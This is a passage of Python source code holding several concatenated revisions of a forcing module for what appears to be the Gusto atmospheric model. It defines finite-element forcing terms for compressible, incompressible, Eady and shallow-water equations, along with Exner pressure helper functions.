        # pressure field when apply() is called with incompressible=True
        Vp = state.spaces("DG")
        p = TrialFunction(Vp)
        q = TestFunction(Vp)
        self.divu = Function(Vp)
        a = p*q*dx
        L = q*div(u0)*dx
        divergence_problem = LinearVariationalProblem(
            a, L, self.divu)
        self.divergence_solver = LinearVariationalSolver(divergence_problem)

    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # see Forcing.apply: x_out = x_in + scaling*F(x_nl)
        self.x0.assign(x_nl)
        self.scaling.assign(scaling)
        if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
            self.mu_scaling.assign(kwargs['mu_alpha'])
        self.u_forcing_solver.solve()  # places forcing in self.uF
        u_out, p_out, _ = x_out.split()
        x_out.assign(x_in)
        u_out += self.uF
        if 'incompressible' in kwargs and kwargs['incompressible']:
            self.divergence_solver.solve()
            p_out.assign(self.divu)
class EadyForcing(Forcing):
    """
    Forcing class for Eady Boussinesq equations.
    """
    def _build_forcing_solver(self):
        """
        Put forcing terms into the u & b equations.
        """
        state = self.state
        self.scaling = Constant(1.)
        Vu = state.spaces("HDiv")
        Vp = state.spaces("DG")
        W = state.W
        dbdy = state.parameters.dbdy
        H = state.parameters.H
        # vertical coordinate relative to mid-depth, used by the Eady term
        eady_exp = Function(Vp).interpolate(Expression(("x[2]-H/2"), H=H))
        self.x0 = Function(W)   # copy x to here
        u0, p0, b0 = split(self.x0)
        # u_forcing
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        Omega = state.Omega
        mu = state.mu
        a = inner(w, F)*dx
        L = self.scaling*(
            div(w)*p0  # pressure gradient
            + b0*inner(w, state.k)  # gravity term
            - dbdy*eady_exp*inner(w, as_vector([0., 1., 0.]))  # Eady forcing
        )*dx
        if self.euler_poincare:
            L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
        if Omega is not None:
            L -= self.scaling*inner(w, cross(2*Omega, u0))*dx  # Coriolis term
        if mu is not None:
            # sponge-layer damping of the vertical velocity component
            self.mu_scaling = Constant(1.)
            L -= self.mu_scaling*mu*inner(w, state.k)*inner(u0, state.k)*dx
        bcs = [DirichletBC(Vu, 0.0, "bottom"),
               DirichletBC(Vu, 0.0, "top")]
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
        # b_forcing
        Vb = state.spaces("HDiv_v")
        F = TrialFunction(Vb)
        gamma = TestFunction(Vb)
        self.bF = Function(Vb)
        a = gamma*F*dx
        L = -gamma*self.scaling*(dbdy*inner(u0, as_vector([0., 1., 0.])))*dx
        b_forcing_problem = LinearVariationalProblem(
            a, L, self.bF
        )
        self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
        # divergence_free
        Vp = state.spaces("DG")
        p = TrialFunction(Vp)
        q = TestFunction(Vp)
        self.divu = Function(Vp)
        a = p*q*dx
        L = q*div(u0)*dx
        divergence_problem = LinearVariationalProblem(
            a, L, self.divu)
        self.divergence_solver = LinearVariationalSolver(divergence_problem)

    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # see Forcing.apply: x_out = x_in + scaling*F(x_nl)
        self.x0.assign(x_nl)
        self.scaling.assign(scaling)
        if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
            self.mu_scaling.assign(kwargs['mu_alpha'])
        self.u_forcing_solver.solve()  # places forcing in self.uF
        self.b_forcing_solver.solve()  # places forcing in self.bF
        u_out, p_out, b_out = x_out.split()
        x_out.assign(x_in)
        u_out += self.uF
        b_out += self.bF
        if kwargs.get("incompressible", False):
            self.divergence_solver.solve()
            p_out.assign(self.divu)
class ShallowWaterForcing(Forcing):
    """Forcing class for the rotating shallow water equations (Coriolis,
    pressure gradient, optional topography and Euler-Poincare terms)."""
    def _build_forcing_solver(self):
        state = self.state
        g = state.parameters.g
        f = state.fields("coriolis")
        Vu = state.spaces("HDiv")
        W = state.W
        self.x0 = Function(W)   # copy x to here
        u0, D0 = split(self.x0)
        n = FacetNormal(state.mesh)
        # upwind value of the normal velocity on interior facets
        un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        a = inner(w, F)*dx
        L = (
            (-f*inner(w, state.perp(u0)) + g*div(w)*D0)*dx
            - g*inner(jump(w, n), un('+')*D0('+') - un('-')*D0('-'))*dS)
        if hasattr(state.fields, "topography"):
            # topography contributes like an extra depth term
            b = state.fields("topography")
            L += g*div(w)*b*dx - g*inner(jump(w, n), un('+')*b('+') - un('-')*b('-'))*dS
        if self.euler_poincare:
            L -= 0.5*div(w)*inner(u0, u0)*dx
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF)
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)

    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # see Forcing.apply: x_out = x_in + scaling*F(x_nl)
        self.x0.assign(x_nl)
        self.u_forcing_solver.solve()  # places forcing in self.uF
        # here the scaling multiplies the solved forcing directly rather
        # than entering the form through a Constant
        self.uF *= scaling
        uF, _ = x_out.split()
        x_out.assign(x_in)
        uF += self.uF
class NoForcing(Forcing):
    """Forcing class that applies no forcing at all."""
    def _build_forcing_solver(self):
        # no solvers to assemble: the forcing is identically zero
        pass

    def apply(self, scale, x_in, x_nl, x_out, **kwargs):
        # x_out = x_in + scale*0 = x_in
        x_out.assign(x_in)
# Revision note: fix some lint (e.g. "!= None" -> "is not None").
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, Expression, as_vector
class Forcing(object):
    """
    Base class for forcing terms for Gusto.

    :arg state: x :class:`.State` object.
    :arg euler_poincare: if True then the momentum equation is in Euler
        Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
        If False then this term is not added.
    :arg linear: if True then we are solving a linear equation so nonlinear
        terms (namely the Euler Poincare term) should not be added.
    :arg extra_terms: optional extra momentum forcing expression.
    """
    # Python 2 style abstract base class declaration.
    __metaclass__ = ABCMeta

    def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None):
        self.state = state
        if linear:
            # the Euler-Poincare term is nonlinear, so drop it in the
            # linear case and warn the caller
            self.euler_poincare = False
            warning('Setting euler_poincare to False because you have set linear=True')
        else:
            self.euler_poincare = euler_poincare
        self.extra_terms = extra_terms
        # subclasses assemble their variational solvers here
        self._build_forcing_solver()

    @abstractmethod
    def _build_forcing_solver(self):
        pass

    @abstractmethod
    def apply(self, scale, x, x_nl, x_out, **kwargs):
        """
        Function takes x as input, computes F(x_nl) and returns
        x_out = x + scale*F(x_nl)
        as output.

        :arg x: :class:`.Function` object
        :arg x_nl: :class:`.Function` object
        :arg x_out: :class:`.Function` object
        :arg mu_alpha: scale for sponge term, if present
        """
        pass
class CompressibleForcing(Forcing):
    """
    Forcing class for compressible Euler equations.
    """
    def _build_forcing_solver(self):
        """
        Only put forcing terms into the u equation.
        """
        state = self.state
        self.scaling = Constant(1.)
        Vu = state.spaces("HDiv")
        W = state.W
        self.x0 = Function(W)   # copy x to here
        u0,rho0,theta0 = split(self.x0)
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        Omega = state.Omega
        cp = state.parameters.cp
        mu = state.mu
        n = FacetNormal(state.mesh)
        pi = exner(theta0, rho0, state)
        a = inner(w,F)*dx
        L = self.scaling*(
            + cp*div(theta0*w)*pi*dx  # pressure gradient [volume]
            - cp*jump(w*theta0,n)*avg(pi)*dS_v  # pressure gradient [surface]
        )
        if state.geopotential_form:
            Phi = state.Phi
            L += self.scaling*div(w)*Phi*dx  # gravity term
        else:
            g = state.parameters.g
            L -= self.scaling*g*inner(w,state.k)*dx  # gravity term
        if self.euler_poincare:
            L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
        if Omega is not None:
            L -= self.scaling*inner(w,cross(2*Omega,u0))*dx  # Coriolis term
        if mu is not None:
            # sponge-layer damping of the vertical velocity component
            self.mu_scaling = Constant(1.)
            L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
        bcs = [DirichletBC(Vu, 0.0, "bottom"),
               DirichletBC(Vu, 0.0, "top")]
        if self.extra_terms is not None:
            L += self.scaling*inner(w, self.extra_terms)*dx
        u_forcing_problem = LinearVariationalProblem(
            a,L,self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)

    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # see Forcing.apply: x_out = x_in + scaling*F(x_nl)
        self.x0.assign(x_nl)
        self.scaling.assign(scaling)
        if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
            self.mu_scaling.assign(kwargs['mu_alpha'])
        self.u_forcing_solver.solve()  # places forcing in self.uF
        u_out, _, _ = x_out.split()
        x_out.assign(x_in)
        u_out += self.uF
def exner(theta, rho, state):
    """Return the Exner pressure:

    pi = (R_d/p_0)^(kappa/(1-kappa)) * (rho*theta)^(kappa/(1-kappa)),

    with the gas constants taken from state.parameters.
    """
    params = state.parameters
    expo = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**expo * pow(rho*theta, expo)
def exner_rho(theta, rho, state):
    """Return the derivative of the Exner pressure with respect to rho."""
    params = state.parameters
    expo = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**expo * pow(rho*theta, expo - 1)*theta*expo
def exner_theta(theta, rho, state):
    """Return the derivative of the Exner pressure with respect to theta."""
    params = state.parameters
    expo = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**expo * pow(rho*theta, expo - 1)*rho*expo
class IncompressibleForcing(Forcing):
    """
    Forcing class for incompressible Euler Boussinesq equations.
    """
    def _build_forcing_solver(self):
        """
        Only put forcing terms into the u equation.
        """
        state = self.state
        self.scaling = Constant(1.)
        Vu = state.spaces("HDiv")
        W = state.W
        self.x0 = Function(W)   # copy x to here
        u0,p0,b0 = split(self.x0)
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        Omega = state.Omega
        mu = state.mu
        a = inner(w,F)*dx
        L = (
            self.scaling*div(w)*p0*dx  # pressure gradient
            + self.scaling*b0*inner(w,state.k)*dx  # gravity term
        )
        if self.euler_poincare:
            L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
        if Omega is not None:
            L -= self.scaling*inner(w,cross(2*Omega,u0))*dx  # Coriolis term
        if mu is not None:
            # sponge-layer damping of the vertical velocity component
            self.mu_scaling = Constant(1.)
            L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
        bcs = [DirichletBC(Vu, 0.0, "bottom"),
               DirichletBC(Vu, 0.0, "top")]
        u_forcing_problem = LinearVariationalProblem(
            a,L,self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
        # projection of div(u) into the pressure space, used to reset the
        # pressure field when apply() is called with incompressible=True
        Vp = state.spaces("DG")
        p = TrialFunction(Vp)
        q = TestFunction(Vp)
        self.divu = Function(Vp)
        a = p*q*dx
        L = q*div(u0)*dx
        divergence_problem = LinearVariationalProblem(
            a, L, self.divu)
        self.divergence_solver = LinearVariationalSolver(divergence_problem)

    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # see Forcing.apply: x_out = x_in + scaling*F(x_nl)
        self.x0.assign(x_nl)
        self.scaling.assign(scaling)
        if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
            self.mu_scaling.assign(kwargs['mu_alpha'])
        self.u_forcing_solver.solve()  # places forcing in self.uF
        u_out, p_out, _ = x_out.split()
        x_out.assign(x_in)
        u_out += self.uF
        if 'incompressible' in kwargs and kwargs['incompressible']:
            self.divergence_solver.solve()
            p_out.assign(self.divu)
class EadyForcing(Forcing):
    """
    Forcing class for Eady Boussinesq equations.

    Adds terms proportional to the background buoyancy gradient dbdy to
    both the velocity and buoyancy equations.
    """
    def _build_forcing_solver(self):
        """
        Put forcing terms into the u & b equations.
        """
        state = self.state
        # scaling constant multiplying the explicit forcing terms
        self.scaling = Constant(1.)
        Vu = state.spaces("HDiv")
        Vp = state.spaces("DG")
        W = state.W
        dbdy = state.parameters.dbdy
        H = state.parameters.H
        # z - H/2: height measured from the mid-level of the domain
        eady_exp = Function(Vp).interpolate(Expression(("x[2]-H/2"),H=H))
        self.x0 = Function(W) # copy x to here
        u0,p0,b0 = split(self.x0)
        # u_forcing
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        Omega = state.Omega
        mu = state.mu
        # mass matrix of the projection into Vu
        a = inner(w,F)*dx
        L = self.scaling*(
            div(w)*p0 # pressure gradient
            + b0*inner(w,state.k) # gravity term
            - dbdy*eady_exp*inner(w,as_vector([0.,1.,0.])) # Eady forcing
        )*dx
        if self.euler_poincare:
            # 0.5*grad(u^2) term arising from the Euler-Poincare form
            L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
        if Omega is not None:
            L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
        if mu is not None:
            # sponge layer gets its own scaling (set via the mu_alpha kwarg)
            self.mu_scaling = Constant(1.)
            L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
        # no normal flow through the top and bottom boundaries
        bcs = [DirichletBC(Vu, 0.0, "bottom"),
               DirichletBC(Vu, 0.0, "top")]
        u_forcing_problem = LinearVariationalProblem(
            a,L,self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
        # b_forcing: projection of -dbdy*v into the buoyancy space
        Vb = state.spaces("HDiv_v")
        F = TrialFunction(Vb)
        gamma = TestFunction(Vb)
        self.bF = Function(Vb)
        a = gamma*F*dx
        L = -gamma*self.scaling*(dbdy*inner(u0,as_vector([0.,1.,0.])))*dx
        b_forcing_problem = LinearVariationalProblem(
            a,L,self.bF
        )
        self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
        # divergence_free: projection of div(u0) into the pressure space
        Vp = state.spaces("DG")
        p = TrialFunction(Vp)
        q = TestFunction(Vp)
        self.divu = Function(Vp)
        a = p*q*dx
        L = q*div(u0)*dx
        divergence_problem = LinearVariationalProblem(
            a, L, self.divu)
        self.divergence_solver = LinearVariationalSolver(divergence_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """
        Set x_out = x_in + scaling*F(x_nl) in the u and b components;
        optionally overwrite the pressure with the projection of div(u0).
        """
        self.x0.assign(x_nl)
        self.scaling.assign(scaling)
        if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
            self.mu_scaling.assign(kwargs['mu_alpha'])
        self.u_forcing_solver.solve() # places forcing in self.uF
        self.b_forcing_solver.solve() # places forcing in self.bF
        u_out, p_out, b_out = x_out.split()
        x_out.assign(x_in)
        u_out += self.uF
        b_out += self.bF
        if kwargs.get("incompressible", False):
            self.divergence_solver.solve()
            p_out.assign(self.divu)
class ShallowWaterForcing(Forcing):
    """Forcing terms (Coriolis, pressure gradient, optional topography)
    for the rotating shallow water equations."""
    def _build_forcing_solver(self):
        state = self.state
        g = state.parameters.g
        f = state.fields("coriolis")
        Vu = state.spaces("HDiv")
        W = state.W
        self.x0 = Function(W) # copy x to here
        u0, D0 = split(self.x0)
        n = FacetNormal(state.mesh)
        # upwind value of the normal velocity on interior facets
        un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
        F = TrialFunction(Vu)
        w = TestFunction(Vu)
        self.uF = Function(Vu)
        # mass matrix of the projection into Vu
        a = inner(w, F)*dx
        L = (
            (-f*inner(w, state.perp(u0)) + g*div(w)*D0)*dx
            - g*inner(jump(w, n), un('+')*D0('+') - un('-')*D0('-'))*dS)
        if hasattr(state.fields, "topography"):
            # g*grad(b) with the same upwinded facet treatment
            b = state.fields("topography")
            L += g*div(w)*b*dx - g*inner(jump(w, n), un('+')*b('+') - un('-')*b('-'))*dS
        if self.euler_poincare:
            # 0.5*grad(u^2) term from the Euler-Poincare form
            L -= 0.5*div(w)*inner(u0, u0)*dx
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF)
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Set x_out = x_in + scaling*F(x_nl) in the velocity component."""
        self.x0.assign(x_nl)
        self.u_forcing_solver.solve() # places forcing in self.uF
        # here the scaling is applied to the solved forcing, not the form
        self.uF *= scaling
        uF, _ = x_out.split()
        x_out.assign(x_in)
        uF += self.uF
class NoForcing(Forcing):
    """Forcing class that applies no forcing: x_out is a copy of x_in."""
    def _build_forcing_solver(self):
        # nothing to build: there are no forcing terms
        pass
    def apply(self, scale, x_in, x_nl, x_out, **kwargs):
        # ignore scale and x_nl entirely; just copy the input state through
        x_out.assign(x_in)
|
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, as_vector, SpatialCoordinate
__all__ = ["CompressibleForcing", "IncompressibleForcing", "EadyForcing", "CompressibleEadyForcing", "ShallowWaterForcing", "NoForcing", "exner", "exner_rho", "exner_theta"]
class Forcing(object, metaclass=ABCMeta):
    """
    Base class for forcing terms for Gusto.
    :arg state: x :class:`.State` object.
    :arg euler_poincare: if True then the momentum equation is in Euler
    Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
    If False then this term is not added.
    :arg linear: if True then we are solving a linear equation so nonlinear
    terms (namely the Euler Poincare term) should not be added.
    :arg extra_terms: extra terms to add to the u component of the forcing
    term - these will be multiplied by the appropriate test function.
    :arg moisture: optional collection of moisture quantities used by
    subclasses -- presumably fields; TODO confirm the expected type.
    """
    def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None, moisture=None):
        self.state = state
        if linear:
            # the Euler-Poincare term is nonlinear, so drop it for linear runs
            self.euler_poincare = False
            warning('Setting euler_poincare to False because you have set linear=True')
        else:
            self.euler_poincare = euler_poincare
        # set up functions
        self.Vu = state.spaces("HDiv")
        # this is the function that the forcing term is applied to
        self.x0 = Function(state.W)
        self.test = TestFunction(self.Vu)
        self.trial = TrialFunction(self.Vu)
        # this is the function that contains the result of solving
        # <test, trial> = <test, F(x0)>, where F is the forcing term
        self.uF = Function(self.Vu)
        # find out which terms we need
        self.extruded = self.Vu.extruded
        self.coriolis = state.Omega is not None or hasattr(state.fields, "coriolis")
        self.sponge = state.mu is not None
        self.topography = hasattr(state.fields, "topography")
        self.extra_terms = extra_terms
        self.moisture = moisture
        # some constants to use for scaling terms
        self.scaling = Constant(1.)
        self.mu_scaling = Constant(1.)
        self._build_forcing_solvers()
    def mass_term(self):
        # mass matrix used to project the forcing onto Vu
        return inner(self.test, self.trial)*dx
    def coriolis_term(self):
        # -test . (2*Omega x u); overridden by ShallowWaterForcing
        u0 = split(self.x0)[0]
        return -inner(self.test, cross(2*self.state.Omega, u0))*dx
    def sponge_term(self):
        # damping of the vertical velocity component by the profile mu
        u0 = split(self.x0)[0]
        return self.state.mu*inner(self.test, self.state.k)*inner(u0, self.state.k)*dx
    def euler_poincare_term(self):
        # -0.5*div(test)*|u|^2, i.e. 0.5*grad(u^2) integrated by parts
        u0 = split(self.x0)[0]
        return -0.5*div(self.test)*inner(u0, u0)*dx
    @abstractmethod
    def pressure_gradient_term(self):
        # must be provided by each equation-specific subclass
        pass
    def forcing_term(self):
        """Assemble the scaled sum of all active forcing terms."""
        L = self.pressure_gradient_term()
        if self.extruded:
            # gravity only applies on extruded (vertical-direction) meshes
            L += self.gravity_term()
        if self.coriolis:
            L += self.coriolis_term()
        if self.euler_poincare:
            L += self.euler_poincare_term()
        if self.topography:
            L += self.topography_term()
        if self.extra_terms is not None:
            L += inner(self.test, self.extra_terms)*dx
        # scale L
        L = self.scaling * L
        # sponge term has a separate scaling factor as it is always implicit
        if self.sponge:
            L -= self.mu_scaling*self.sponge_term()
        return L
    def _build_forcing_solvers(self):
        """Build the linear solver that projects the forcing into Vu."""
        a = self.mass_term()
        L = self.forcing_term()
        if self.Vu.extruded:
            # no normal flow through top and bottom of the domain
            bcs = [DirichletBC(self.Vu, 0.0, "bottom"),
                   DirichletBC(self.Vu, 0.0, "top")]
        else:
            bcs = None
        u_forcing_problem = LinearVariationalProblem(
            a, L, self.uF, bcs=bcs
        )
        self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """
        Function takes x as input, computes F(x_nl) and returns
        x_out = x + scale*F(x_nl)
        as output.
        :arg x_in: :class:`.Function` object
        :arg x_nl: :class:`.Function` object
        :arg x_out: :class:`.Function` object
        :arg mu_alpha: scale for sponge term, if present
        """
        self.scaling.assign(scaling)
        self.x0.assign(x_nl)
        mu_scaling = kwargs.get("mu_alpha")
        if mu_scaling is not None:
            self.mu_scaling.assign(mu_scaling)
        self.u_forcing_solver.solve() # places forcing in self.uF
        uF = x_out.split()[0]
        x_out.assign(x_in)
        uF += self.uF
class CompressibleForcing(Forcing):
    """
    Forcing class for compressible Euler equations.
    """
    def pressure_gradient_term(self):
        """cp*theta*grad(pi) pressure gradient, integrated by parts over
        cells with an average-Exner flux on vertical interior facets."""
        u0, rho0, theta0 = split(self.x0)
        cp = self.state.parameters.cp
        n = FacetNormal(self.state.mesh)
        # introduce density potential temp
        theta_rho = Function(theta0.function_space()).assign(theta0)
        # adjust density potential temp for moisture species
        if self.moisture is not None:
            water_t = Function(theta0.function_space())
            # BUG FIX: was `for water in moisture` -- `moisture` is not a
            # local name here, the constructor stores it on the instance
            for water in self.moisture:
                water_t += water
            theta_rho = theta_rho / (1 + water_t)
        pi = exner(theta0, rho0, self.state)
        L = (
            + cp*div(theta_rho*self.test)*pi*dx
            - cp*jump(self.test*theta_rho, n)*avg(pi)*dS_v
        )
        return L
    def gravity_term(self):
        """Gravity as either a geopotential gradient or -g*k."""
        if self.state.geopotential_form:
            L = div(self.test)*self.state.Phi*dx
        else:
            g = self.state.parameters.g
            L = -g*inner(self.test, self.state.k)*dx
        return L
    def theta_forcing(self):
        """Moist correction to theta driven by the velocity divergence."""
        cv = self.state.parameters.cv
        # BUG FIX: cp was read below but never bound, raising NameError
        cp = self.state.parameters.cp
        c_vv = self.state.parameters.c_vv
        c_pv = self.state.parameters.c_pv
        c_pl = self.state.parameters.c_pl
        R_d = self.state.parameters.R_d
        R_v = self.state.parameters.R_v
        u0, _, theta0 = split(self.x0)
        water_v = self.state.fields('water_v')
        water_c = self.state.fields('water_c')
        # moist heat capacities and gas constant
        c_vml = cv + water_v * c_vv + water_c * c_pl
        c_pml = cp + water_v * c_pv + water_c * c_pl
        R_m = R_d + water_v * R_v
        L = -theta0 * (R_m / c_vml - (R_d * c_pml) / (cp * c_vml)) * div(u0)
        # scale like every other forcing term (matches the velocity forcing)
        return self.scaling * L
    def _build_forcing_solvers(self):
        super(CompressibleForcing, self)._build_forcing_solvers()
        if self.moisture is not None:
            _, _, theta0 = split(self.x0)
            Vt = theta0.function_space()
            p = TrialFunction(Vt)
            q = TestFunction(Vt)
            self.theta_new = Function(Vt)
            a = p * q * dx
            # BUG FIX: was `q * dx * self.theta_forcing()`; the measure dx
            # must multiply the whole integrand, it cannot sit mid-product
            L = q * self.theta_forcing() * dx
            theta_problem = LinearVariationalProblem(a, L, self.theta_new)
            self.theta_solver = LinearVariationalSolver(theta_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Apply the velocity forcing, then (for moist compressible runs)
        update theta from the moist divergence forcing."""
        super(CompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
        if 'compressible' in kwargs and kwargs['compressible']:
            if self.moisture is not None:
                _, _, theta_out = x_out.split()
                self.theta_solver.solve()
                # NOTE(review): this overwrites theta_out with the projected
                # forcing rather than incrementing it -- confirm += is not
                # intended
                theta_out.assign(self.theta_new)
def exner(theta, rho, state):
    """
    Compute the exner function.
    """
    params = state.parameters
    exponent = params.kappa/(1 - params.kappa)
    return (params.R_d/params.p_0)**exponent * pow(rho*theta, exponent)
def exner_rho(theta, rho, state):
    """Return the derivative of the Exner function with respect to rho."""
    params = state.parameters
    exponent = params.kappa/(1 - params.kappa)
    prefactor = (params.R_d/params.p_0)**exponent
    # d/drho[(rho*theta)^e] = e * theta * (rho*theta)^(e-1)
    return prefactor * pow(rho*theta, exponent - 1) * theta * exponent
def exner_theta(theta, rho, state):
    """Return the derivative of the Exner function with respect to theta."""
    params = state.parameters
    exponent = params.kappa/(1 - params.kappa)
    prefactor = (params.R_d/params.p_0)**exponent
    # d/dtheta[(rho*theta)^e] = e * rho * (rho*theta)^(e-1)
    return prefactor * pow(rho*theta, exponent - 1) * rho * exponent
class IncompressibleForcing(Forcing):
    """
    Forcing class for incompressible Euler Boussinesq equations.

    Supplies the pressure-gradient and buoyancy terms for the velocity
    forcing, and a projection of div(u) into the pressure space used to
    reset the pressure when requested.
    """
    def pressure_gradient_term(self):
        """Integrated-by-parts pressure gradient: div(test)*p."""
        p0 = split(self.x0)[1]
        return div(self.test)*p0*dx
    def gravity_term(self):
        """Buoyancy acting along the vertical unit vector k."""
        b0 = split(self.x0)[2]
        return b0*inner(self.test, self.state.k)*dx
    def _build_forcing_solvers(self):
        super(IncompressibleForcing, self)._build_forcing_solvers()
        # additionally build the projection of div(u0) into the DG
        # pressure space, consumed by apply()
        pressure_space = self.state.spaces("DG")
        trial = TrialFunction(pressure_space)
        test = TestFunction(pressure_space)
        self.divu = Function(pressure_space)
        u0 = split(self.x0)[0]
        mass = trial*test*dx
        rhs = test*div(u0)*dx
        self.divergence_solver = LinearVariationalSolver(
            LinearVariationalProblem(mass, rhs, self.divu))
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Apply the velocity forcing; if the 'incompressible' kwarg is
        truthy, overwrite the pressure with the projection of div(u0)."""
        super(IncompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
        if kwargs.get('incompressible'):
            p_out = x_out.split()[1]
            self.divergence_solver.solve()
            p_out.assign(self.divu)
class EadyForcing(IncompressibleForcing):
    """
    Forcing class for Eady Boussinesq equations.

    Extends the incompressible forcing with terms proportional to the
    background buoyancy gradient dbdy in the u and b equations.
    """
    def forcing_term(self):
        L = Forcing.forcing_term(self)
        dbdy = self.state.parameters.dbdy
        H = self.state.parameters.H
        Vp = self.state.spaces("DG")
        _, _, z = SpatialCoordinate(self.state.mesh)
        # z - H/2: height measured from the mid-level of the domain
        eady_exp = Function(Vp).interpolate(z-H/2.)
        # Eady forcing acting on the y-component of the velocity
        L -= self.scaling*dbdy*eady_exp*inner(self.test, as_vector([0., 1., 0.]))*dx
        return L
    def _build_forcing_solvers(self):
        super(EadyForcing, self)._build_forcing_solvers()
        # b_forcing: projection of -dbdy*v into the buoyancy space
        dbdy = self.state.parameters.dbdy
        Vb = self.state.spaces("HDiv_v")
        F = TrialFunction(Vb)
        gamma = TestFunction(Vb)
        self.bF = Function(Vb)
        u0, _, b0 = split(self.x0)
        a = gamma*F*dx
        L = -self.scaling*gamma*(dbdy*inner(u0, as_vector([0., 1., 0.])))*dx
        b_forcing_problem = LinearVariationalProblem(
            a, L, self.bF
        )
        self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        """Apply the velocity forcing, then add the buoyancy forcing."""
        super(EadyForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
        self.b_forcing_solver.solve()  # places forcing in self.bF
        _, _, b_out = x_out.split()
        b_out += self.bF
class CompressibleEadyForcing(CompressibleForcing):
    """
    Forcing class for compressible Eady equations.

    Extends the compressible forcing with terms proportional to the
    background theta gradient dthetady in the u and theta equations.
    """
    def forcing_term(self):
        # L = super(EadyForcing, self).forcing_term()
        L = Forcing.forcing_term(self)
        dthetady = self.state.parameters.dthetady
        Pi0 = self.state.parameters.Pi0
        cp = self.state.parameters.cp
        _, rho0, theta0 = split(self.x0)
        Pi = exner(theta0, rho0, self.state)
        Pi_0 = Constant(Pi0)
        # deviation of Exner pressure from the reference Pi0 drives the
        # y-component of the velocity
        L += self.scaling*cp*dthetady*(Pi-Pi_0)*inner(self.test, as_vector([0., 1., 0.]))*dx  # Eady forcing
        return L
    def _build_forcing_solvers(self):
        super(CompressibleEadyForcing, self)._build_forcing_solvers()
        # theta_forcing: projection of -dthetady*v into the theta space
        dthetady = self.state.parameters.dthetady
        Vt = self.state.spaces("HDiv_v")
        F = TrialFunction(Vt)
        gamma = TestFunction(Vt)
        self.thetaF = Function(Vt)
        u0, _, _ = split(self.x0)
        a = gamma*F*dx
        L = -self.scaling*gamma*(dthetady*inner(u0, as_vector([0., 1., 0.])))*dx
        theta_forcing_problem = LinearVariationalProblem(
            a, L, self.thetaF
        )
        self.theta_forcing_solver = LinearVariationalSolver(theta_forcing_problem)
    def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
        # call Forcing.apply directly, bypassing CompressibleForcing's
        # moist theta update, then add the Eady theta forcing
        Forcing.apply(self, scaling, x_in, x_nl, x_out, **kwargs)
        self.theta_forcing_solver.solve()  # places forcing in self.thetaF
        _, _, theta_out = x_out.split()
        theta_out += self.thetaF
class ShallowWaterForcing(Forcing):
    """Forcing terms for the rotating shallow water equations."""
    def coriolis_term(self):
        """-f * test . perp(u) with the spatially varying Coriolis field f."""
        u0 = split(self.x0)[0]
        coriolis = self.state.fields("coriolis")
